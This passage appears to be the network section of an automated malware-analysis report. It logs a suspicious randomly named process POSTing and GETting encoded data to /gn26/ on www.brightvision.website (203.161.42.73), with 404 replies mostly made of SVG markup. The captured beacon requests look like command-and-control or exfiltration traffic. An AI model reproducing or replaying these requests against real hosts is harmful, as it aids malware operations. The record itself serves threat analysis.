                                                            Nov 20, 2024 21:11:19.464287043 CET1236INData Raw: 6f 6e 65 3b 73 74 72 6f 6b 65 2d 6f 70 61 63 69 74 79 3a 31 3b 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 31 37 30 2e 31
                                                            Data Ascii: one;stroke-opacity:1;" /> <path transform="translate(-170.14515,-0.038164)" id="path4567" d="m 321.74355,168.0687 c -1e-5,3.3913 -3.42414,11.26702 -8.73834,11.26702 -5.3142,0 -18.59463,27.24606


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            34192.168.2.550011203.161.42.73806576C:\Program Files (x86)\VTzihlzzLzedQPFiXqrTetDAzsRToqWcPJcGXqmeLoOhjkiIhXCvjxwbRYbQ\uxnRAYhIPZRPiA.exe
                                                            TimestampBytes transferredDirectionData
                                                            Nov 20, 2024 21:11:20.966727972 CET675OUTPOST /gn26/ HTTP/1.1
                                                            Accept: */*
                                                            Accept-Language: en-US
                                                            Accept-Encoding: gzip, deflate, br
                                                            Content-Length: 226
                                                            Connection: close
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Cache-Control: max-age=0
                                                            Host: www.brightvision.website
                                                            Origin: http://www.brightvision.website
                                                            Referer: http://www.brightvision.website/gn26/
                                                            User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
                                                            Data Raw: 73 56 43 38 7a 3d 53 69 42 7a 57 57 4a 31 73 4f 54 33 52 55 6c 38 6a 72 55 53 39 47 47 67 39 35 4e 64 43 66 35 59 44 46 39 4c 76 49 70 70 64 71 33 6d 52 79 41 79 48 4e 59 6f 6f 32 35 48 37 32 72 6b 4e 6e 71 75 51 38 76 6a 56 4b 4b 75 36 50 77 54 34 4a 61 35 73 67 37 77 69 73 55 77 4d 6c 46 30 46 61 31 56 61 4c 66 66 4c 35 36 7a 30 6e 6f 55 75 57 2b 4b 73 58 4f 4a 59 6d 34 4b 34 45 71 77 4c 44 4f 39 51 70 34 46 77 49 57 71 51 33 71 41 4e 34 45 4a 2b 6a 77 36 68 71 4f 51 52 59 6f 49 4c 41 68 58 6b 4e 59 75 57 50 37 69 45 6b 6c 48 44 44 32 76 4d 52 6f 36 47 63 46 46 75 46 63 58 44 30 6d 50 69 46 59 70 30 4a 32 34 71 47 6e 4a 32 33 47 6d 54 61 67 6d 72 33 47 6a 6e 4f 58 58
                                                            Data Ascii: sVC8z=SiBzWWJ1sOT3RUl8jrUS9GGg95NdCf5YDF9LvIppdq3mRyAyHNYoo25H72rkNnquQ8vjVKKu6PwT4Ja5sg7wisUwMlF0Fa1VaLffL56z0noUuW+KsXOJYm4K4EqwLDO9Qp4FwIWqQ3qAN4EJ+jw6hqOQRYoILAhXkNYuWP7iEklHDD2vMRo6GcFFuFcXD0mPiFYp0J24qGnJ23GmTagmr3GjnOXX
                                                            Nov 20, 2024 21:11:22.231471062 CET1236INHTTP/1.1 404 Not Found
                                                            Date: Wed, 20 Nov 2024 20:11:22 GMT
                                                            Server: Apache
                                                            Content-Length: 16052
                                                            Connection: close
                                                            Content-Type: text/html
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 [TRUNCATED]
                                                            Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="/42.css"></head><body>... partial:index.partial.html --><main> <svg viewBox="0 0 541.17206 328.45184" height="328.45184" width="541.17206" id="svg2" version="1.1"> <metadata id="metadata8"> </metadata> <defs id="defs6"> <pattern patternUnits="userSpaceOnUse" width="1.5" height="1" patternTransform="translate(0,0) scale(10,10)" id="Strips2_1"> <rect style="fill:black;stroke:none" x="0" y="-0.5" width="1" height="2" id="rect5419" /> </pattern> <linearGradient osb:paint="solid" id="linearGradient6096"> <stop id="stop6094" offset="0" [TRUNCATED]
                                                            Nov 20, 2024 21:11:22.231486082 CET1236INData Raw: 3e 0a 20 20 20 20 3c 2f 64 65 66 73 3e 0a 20 20 20 20 3c 67 0a 20 20 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 31 37 30 2e 31 34 35 31 35 2c 30 2e 30 33 38 31 36 34 29 22 0a 20 20 20 20 20 20 20 69 64 3d 22 6c
                                                            Data Ascii: > </defs> <g transform="translate(170.14515,0.038164)" id="layer1"> <g id="g6219" > <path transform="matrix(1.0150687,0,0,11.193923,-1.3895945,-2685.7441)" style="disp
                                                            Nov 20, 2024 21:11:22.231496096 CET1236INData Raw: 38 2e 38 35 38 37 31 35 20 2d 30 2e 36 30 32 31 37 35 2c 2d 33 31 2e 34 36 39 32 32 38 20 2d 30 2e 30 31 32 35 33 2c 2d 32 32 2e 37 35 39 35 36 35 20 30 2e 37 31 37 32 36 32 2c 2d 34 31 2e 32 33 31 34 35 32 31 33 20 31 2e 36 32 38 39 39 35 2c 2d
                                                            Data Ascii: 8.858715 -0.602175,-31.469228 -0.01253,-22.759565 0.717262,-41.23145213 1.628995,-41.23195399 z" style="display:inline;fill:#000000;stroke:none;stroke-width:0.23743393px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;"
                                                            Nov 20, 2024 21:11:22.231504917 CET1236INData Raw: 30 2e 37 36 32 37 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 72 65 63 74 34 35 35 33 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 6f 70 61 63 69 74 79 3a 31 3b 66
                                                            Data Ascii: 0.76272" id="rect4553" style="display:inline;opacity:1;fill:#000000;fill-opacity:1;fill-rule:nonzero;stroke:#000000;stroke-width:1.00157475;stroke-miterlimit:4;stroke-dasharray:none;stroke-opacity:1;" /> <pa
                                                            Nov 20, 2024 21:11:22.231515884 CET1236INData Raw: 32 2c 31 35 2e 35 30 30 36 34 20 30 2e 39 31 36 37 39 38 2c 36 2e 38 33 34 33 34 20 32 2e 32 34 39 38 35 34 2c 31 36 2e 33 33 32 33 37 20 33 2e 34 39 39 39 30 32 2c 32 34 2e 39 31 36 30 34 20 31 2e 32 35 30 30 34 37 2c 38 2e 35 38 33 36 38 20 32
                                                            Data Ascii: 2,15.50064 0.916798,6.83434 2.249854,16.33237 3.499902,24.91604 1.250047,8.58368 2.416611,16.24967 4.583438,28.58394 2.166827,12.33427 5.333153,29.33244 8.499966,46.33323" style="display:inline;fill:none;stroke:#000000;stroke-widt
                                                            Nov 20, 2024 21:11:22.231527090 CET1236INData Raw: 35 31 2c 31 2e 35 32 31 36 35 20 30 2e 32 32 32 39 39 2c 31 2e 30 36 35 37 39 20 30 2e 31 34 39 33 33 2c 30 2e 36 30 39 31 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 66 69 6c
                                                            Data Ascii: 51,1.52165 0.22299,1.06579 0.14933,0.60912" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="path4533" d=
                                                            Nov 20, 2024 21:11:22.231538057 CET1236INData Raw: 6b 65 2d 6c 69 6e 65 63 61 70 3a 62 75 74 74 3b 73 74 72 6f 6b 65 2d 6c 69 6e 65 6a 6f 69 6e 3a 6d 69 74 65 72 3b 73 74 72 6f 6b 65 2d 6f 70 61 63 69 74 79 3a 31 3b 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 0a 20 20 20 20 20 20
                                                            Data Ascii: ke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="path4541" d="m 85.206367,122.98266 c 0.117841,11.74369 0.235693,23.48835 0.235693,36.55072 -10e-7,13.06238 -0.117833,27.43796 -0.05891,45
                                                            Nov 20, 2024 21:11:22.231548071 CET1236INData Raw: 2c 32 36 2e 37 30 30 33 33 20 2d 32 2e 32 39 38 33 39 34 2c 36 2e 39 35 33 36 32 20 2d 32 2e 32 39 38 33 39 34 2c 31 31 2e 35 34 39 32 32 20 2d 31 2e 33 35 35 34 31 39 2c 32 34 2e 35 37 34 31 35 20 30 2e 39 34 32 39 37 34 2c 31 33 2e 30 32 34 39
                                                            Data Ascii: ,26.70033 -2.298394,6.95362 -2.298394,11.54922 -1.355419,24.57415 0.942974,13.02493 2.828182,34.46917 5.066095,53.84746 2.237913,19.37829 4.833109,36.71892 7.425959,54.04387" style="display:inline;fill:none;stroke:#000000;stroke-w
                                                            Nov 20, 2024 21:11:22.231559038 CET1236INData Raw: 31 3b 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 70 61 74 68 34 35 32 39 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 64 3d 22 6d 20 31 33 32 2e 36 38 37 35 2c 32 36 33 2e 33
                                                            Data Ascii: 1;" /> <path id="path4529" d="m 132.6875,263.34998 c -4.2289,18.4155 -8.45806,36.83216 -12.6875,55.25" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-
                                                            Nov 20, 2024 21:11:22.231569052 CET1236INData Raw: 6c 6c 2d 6f 70 61 63 69 74 79 3a 31 3b 66 69 6c 6c 2d 72 75 6c 65 3a 6e 6f 6e 7a 65 72 6f 3b 73 74 72 6f 6b 65 3a 23 30 30 30 30 30 30 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 31 2e 30 30 31 35 37 34 37 35 3b 73 74 72 6f 6b 65 2d 6d 69 74 65 72
                                                            Data Ascii: ll-opacity:1;fill-rule:nonzero;stroke:#000000;stroke-width:1.00157475;stroke-miterlimit:4;stroke-dasharray:none;stroke-opacity:1;" /> <path transform="translate(-170.14515,-0.038164)" id="path4567"
                                                            Nov 20, 2024 21:11:22.351572037 CET1236INData Raw: 2c 30 2e 31 31 38 33 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 6e 6f 6e 65 3b 73 74 72 6f 6b 65 3a 23 30 30 30 30 30 30 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 31 70 78 3b 73 74 72 6f 6b 65 2d 6c 69 6e 65
                                                            Data Ascii: ,0.1183" style="fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path transform="translate(-170.14515,-0.038164)" id="path4578-1"


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            35192.168.2.550012203.161.42.73806576C:\Program Files (x86)\VTzihlzzLzedQPFiXqrTetDAzsRToqWcPJcGXqmeLoOhjkiIhXCvjxwbRYbQ\uxnRAYhIPZRPiA.exe
                                                            TimestampBytes transferredDirectionData
                                                            Nov 20, 2024 21:11:23.625160933 CET1692OUTPOST /gn26/ HTTP/1.1
                                                            Accept: */*
                                                            Accept-Language: en-US
                                                            Accept-Encoding: gzip, deflate, br
                                                            Content-Length: 1242
                                                            Connection: close
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Cache-Control: max-age=0
                                                            Host: www.brightvision.website
                                                            Origin: http://www.brightvision.website
                                                            Referer: http://www.brightvision.website/gn26/
                                                            User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
                                                            Data Raw: 73 56 43 38 7a 3d 53 69 42 7a 57 57 4a 31 73 4f 54 33 52 55 6c 38 6a 72 55 53 39 47 47 67 39 35 4e 64 43 66 35 59 44 46 39 4c 76 49 70 70 64 71 50 6d 51 41 34 79 47 75 67 6f 70 32 35 48 79 57 72 6c 4e 6e 72 73 51 34 4c 6e 56 4b 47 2b 36 4e 34 54 34 72 43 35 34 42 37 77 35 63 55 77 4a 56 46 50 42 61 31 36 61 4c 50 62 4c 35 4b 7a 30 6e 6f 55 75 54 36 4b 38 32 4f 4a 55 47 34 4a 2f 45 71 30 50 44 4f 52 51 6f 63 7a 77 49 53 6c 51 6e 4b 41 4e 5a 6f 4a 38 78 49 36 73 71 4f 53 57 59 6f 41 4c 41 63 50 6b 4e 30 49 57 4f 50 49 45 6e 31 48 41 47 48 48 55 68 34 6b 55 4f 56 6d 6d 43 45 52 65 67 36 79 6b 54 55 48 31 6f 36 35 74 46 54 71 77 7a 71 69 62 37 6b 71 77 67 57 57 6c 72 44 66 37 65 52 30 36 56 6a 31 77 35 4f 58 38 4b 63 49 6b 62 64 49 69 39 2b 48 4d 6c 69 62 4f 44 46 54 2f 53 69 49 71 36 61 71 4d 55 51 42 68 79 42 35 6f 4a 4a 61 54 61 5a 61 66 4e 63 59 7a 2b 33 44 54 62 39 79 38 66 32 6f 79 49 61 2f 69 78 46 31 4c 4b 54 51 63 35 4c 36 6e 70 32 65 64 57 55 35 66 30 46 43 2b 44 76 58 69 68 77 43 6d 48 4c 4d [TRUNCATED]
                                                            Data Ascii: sVC8z=SiBzWWJ1sOT3RUl8jrUS9GGg95NdCf5YDF9LvIppdqPmQA4yGugop25HyWrlNnrsQ4LnVKG+6N4T4rC54B7w5cUwJVFPBa16aLPbL5Kz0noUuT6K82OJUG4J/Eq0PDORQoczwISlQnKANZoJ8xI6sqOSWYoALAcPkN0IWOPIEn1HAGHHUh4kUOVmmCEReg6ykTUH1o65tFTqwzqib7kqwgWWlrDf7eR06Vj1w5OX8KcIkbdIi9+HMlibODFT/SiIq6aqMUQBhyB5oJJaTaZafNcYz+3DTb9y8f2oyIa/ixF1LKTQc5L6np2edWU5f0FC+DvXihwCmHLMNr4qbTChKO6M+tE+Ag8Jk0L1aGaIMjFUPIkBek5cQKe0ebqrf31LY7lb0pnOyx/c489O8f9dWWcx0RWelfdzCQrp/WeNIeuZBDmVHZvEUUixFQCAyPtXowwWqXypxTW3SCFb4QLKug1cc1iKBi+rrXg5GczBL1fmjF8YkymS+Xv4NSOCw7HK6LOFXCt1yJs4hSCkPomao8thP2fof3b670b0We68JOBvw2yVnnsgo6ez7Z+73nprNZshVAleozccQoDHzpGhVcuIROKWMNjLS7KSH3222O6BiHxZRbvO9RNgUjqnnT2g9Pgoe6bB0HGIgCFe3y9ibWQCHlfO/ARonMt60Sr/LL/8inA8T3r67ZMmHTQixBJ/RwDOXro8+ubbc3bbTgGhkKTYA7OlL0guBokp+kHIYcin0YFESQyKtxW4cf9S9QrhJ/cvfZIPX9qCvJL21Q0q3bSBWfyv0g1qRnLdEJXWG8i7exHy46alwpfI9VUxWvOBeKVGuicT2UNM9KSAPiA97IFpSNCxzi3g+z9Hp3jqpTo5Qoc5uMKJxsgzvWsPndnow8Fpg+HIMIq5jJI24Sa/9J9QqDqagZQTszAwIp8QOVzQsdLx+giDIrOT+qJMb4KsTDWPmOM8Hf7C101gSTSat2W4tusrTFqLZcVMQq+9RvJxUp [TRUNCATED]
                                                            Nov 20, 2024 21:11:24.845030069 CET1236INHTTP/1.1 404 Not Found
                                                            Date: Wed, 20 Nov 2024 20:11:24 GMT
                                                            Server: Apache
                                                            Content-Length: 16052
                                                            Connection: close
                                                            Content-Type: text/html
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 [TRUNCATED]
                                                            Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="/42.css"></head><body>... partial:index.partial.html --><main> <svg viewBox="0 0 541.17206 328.45184" height="328.45184" width="541.17206" id="svg2" version="1.1"> <metadata id="metadata8"> </metadata> <defs id="defs6"> <pattern patternUnits="userSpaceOnUse" width="1.5" height="1" patternTransform="translate(0,0) scale(10,10)" id="Strips2_1"> <rect style="fill:black;stroke:none" x="0" y="-0.5" width="1" height="2" id="rect5419" /> </pattern> <linearGradient osb:paint="solid" id="linearGradient6096"> <stop id="stop6094" offset="0" [TRUNCATED]
                                                            Nov 20, 2024 21:11:24.845060110 CET1236INData Raw: 3e 0a 20 20 20 20 3c 2f 64 65 66 73 3e 0a 20 20 20 20 3c 67 0a 20 20 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 31 37 30 2e 31 34 35 31 35 2c 30 2e 30 33 38 31 36 34 29 22 0a 20 20 20 20 20 20 20 69 64 3d 22 6c
                                                            Data Ascii: > </defs> <g transform="translate(170.14515,0.038164)" id="layer1"> <g id="g6219" > <path transform="matrix(1.0150687,0,0,11.193923,-1.3895945,-2685.7441)" style="disp
                                                            Nov 20, 2024 21:11:24.845086098 CET1236INData Raw: 38 2e 38 35 38 37 31 35 20 2d 30 2e 36 30 32 31 37 35 2c 2d 33 31 2e 34 36 39 32 32 38 20 2d 30 2e 30 31 32 35 33 2c 2d 32 32 2e 37 35 39 35 36 35 20 30 2e 37 31 37 32 36 32 2c 2d 34 31 2e 32 33 31 34 35 32 31 33 20 31 2e 36 32 38 39 39 35 2c 2d
                                                            Data Ascii: 8.858715 -0.602175,-31.469228 -0.01253,-22.759565 0.717262,-41.23145213 1.628995,-41.23195399 z" style="display:inline;fill:#000000;stroke:none;stroke-width:0.23743393px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;"
                                                            Nov 20, 2024 21:11:24.845102072 CET1236INData Raw: 30 2e 37 36 32 37 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 72 65 63 74 34 35 35 33 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 6f 70 61 63 69 74 79 3a 31 3b 66
                                                            Data Ascii: 0.76272" id="rect4553" style="display:inline;opacity:1;fill:#000000;fill-opacity:1;fill-rule:nonzero;stroke:#000000;stroke-width:1.00157475;stroke-miterlimit:4;stroke-dasharray:none;stroke-opacity:1;" /> <pa
                                                            Nov 20, 2024 21:11:24.845117092 CET896INData Raw: 32 2c 31 35 2e 35 30 30 36 34 20 30 2e 39 31 36 37 39 38 2c 36 2e 38 33 34 33 34 20 32 2e 32 34 39 38 35 34 2c 31 36 2e 33 33 32 33 37 20 33 2e 34 39 39 39 30 32 2c 32 34 2e 39 31 36 30 34 20 31 2e 32 35 30 30 34 37 2c 38 2e 35 38 33 36 38 20 32
                                                            Data Ascii: 2,15.50064 0.916798,6.83434 2.249854,16.33237 3.499902,24.91604 1.250047,8.58368 2.416611,16.24967 4.583438,28.58394 2.166827,12.33427 5.333153,29.33244 8.499966,46.33323" style="display:inline;fill:none;stroke:#000000;stroke-widt
                                                            Nov 20, 2024 21:11:24.845134020 CET1236INData Raw: 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 70 61 74 68 34 35 32 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 64 3d 22 6d 20 39 31 2e 39 33 37 35 2c 31 32 34 2e 30 39 39 39 38 20
                                                            Data Ascii: /> <path id="path4525" d="m 91.9375,124.09998 c 5.854072,7.16655 11.70824,14.33322 16.21863,20.16651 4.51039,5.83328 7.67706,10.33329 11.92718,16.33346 4.25012,6.00017 9.58322,13.49984 12.66653,18.58299 3.08
                                                            Nov 20, 2024 21:11:24.845149994 CET1236INData Raw: 39 34 33 35 31 37 2c 34 2e 31 32 37 39 35 20 32 2e 38 32 37 35 33 35 2c 31 31 2e 31 39 33 30 32 20 34 2e 30 36 35 30 30 35 2c 31 36 2e 30 32 35 30 31 20 31 2e 32 33 37 34 38 2c 34 2e 38 33 32 20 31 2e 38 32 36 36 38 2c 37 2e 34 32 34 34 37 20 32
                                                            Data Ascii: 943517,4.12795 2.827535,11.19302 4.065005,16.02501 1.23748,4.832 1.82668,7.42447 2.12139,10.84263 0.29471,3.41815 0.29471,7.65958 -0.11785,20.44893 -0.41255,12.78934 -1.23731,34.11536 -2.18014,53.62015 -0.94282,19.50478 -2.003429,37.18159 -3.0
                                                            Nov 20, 2024 21:11:24.845165968 CET448INData Raw: 35 34 2e 32 30 37 36 37 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 66 69 6c 6c 3a 6e 6f 6e 65 3b 73 74 72 6f 6b 65 3a 23 30 30 30 30 30 30 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68
                                                            Data Ascii: 54.20767" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="path4549" d="m 79.25478,124.23266 c -5.440192,
                                                            Nov 20, 2024 21:11:24.845361948 CET1236INData Raw: 39 35 2c 35 33 2e 38 34 37 34 36 20 32 2e 32 33 37 39 31 33 2c 31 39 2e 33 37 38 32 39 20 34 2e 38 33 33 31 30 39 2c 33 36 2e 37 31 38 39 32 20 37 2e 34 32 35 39 35 39 2c 35 34 2e 30 34 33 38 37 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74
                                                            Data Ascii: 95,53.84746 2.237913,19.37829 4.833109,36.71892 7.425959,54.04387" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="pa
                                                            Nov 20, 2024 21:11:24.845525980 CET1236INData Raw: 34 35 38 30 36 2c 33 36 2e 38 33 32 31 36 20 2d 31 32 2e 36 38 37 35 2c 35 35 2e 32 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 66 69 6c 6c 3a 6e 6f 6e 65 3b 73 74 72 6f 6b 65
                                                            Data Ascii: 45806,36.83216 -12.6875,55.25" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <ellipse ry="4.6715717" rx="2.5"
                                                            Nov 20, 2024 21:11:24.967655897 CET1236INData Raw: 6f 6e 65 3b 73 74 72 6f 6b 65 2d 6f 70 61 63 69 74 79 3a 31 3b 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 31 37 30 2e 31
                                                            Data Ascii: one;stroke-opacity:1;" /> <path transform="translate(-170.14515,-0.038164)" id="path4567" d="m 321.74355,168.0687 c -1e-5,3.3913 -3.42414,11.26702 -8.73834,11.26702 -5.3142,0 -18.59463,27.24606


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            36192.168.2.550013203.161.42.7380
                                                            TimestampBytes transferredDirectionData
                                                            Nov 20, 2024 21:11:26.666960001 CET377OUTGET /gn26/?sVC8z=fgpTVhEuh+HnR3p0lfNLmVuUqPxSLN4hCHlB5YwrT5j1SjgoO/sQ0W1xqV3uB3iqP4rffdiJ/shc0ougvjbd7NMKGX1gMLgBVaz3e9231X82jxOqgG++QmJ2h2W7Ejj4Gw==&PPP=FHWL56 HTTP/1.1
                                                            Accept: */*
                                                            Accept-Language: en-US
                                                            Connection: close
                                                            Host: www.brightvision.website
                                                            User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
                                                            Nov 20, 2024 21:11:27.981154919 CET1236INHTTP/1.1 404 Not Found
                                                            Date: Wed, 20 Nov 2024 20:11:27 GMT
                                                            Server: Apache
                                                            Content-Length: 16052
                                                            Connection: close
                                                            Content-Type: text/html; charset=utf-8
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 [TRUNCATED]
                                                            Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="/42.css"></head><body>... partial:index.partial.html --><main> <svg viewBox="0 0 541.17206 328.45184" height="328.45184" width="541.17206" id="svg2" version="1.1"> <metadata id="metadata8"> </metadata> <defs id="defs6"> <pattern patternUnits="userSpaceOnUse" width="1.5" height="1" patternTransform="translate(0,0) scale(10,10)" id="Strips2_1"> <rect style="fill:black;stroke:none" x="0" y="-0.5" width="1" height="2" id="rect5419" /> </pattern> <linearGradient osb:paint="solid" id="linearGradient6096"> <stop id="stop6094" offset="0" [TRUNCATED]
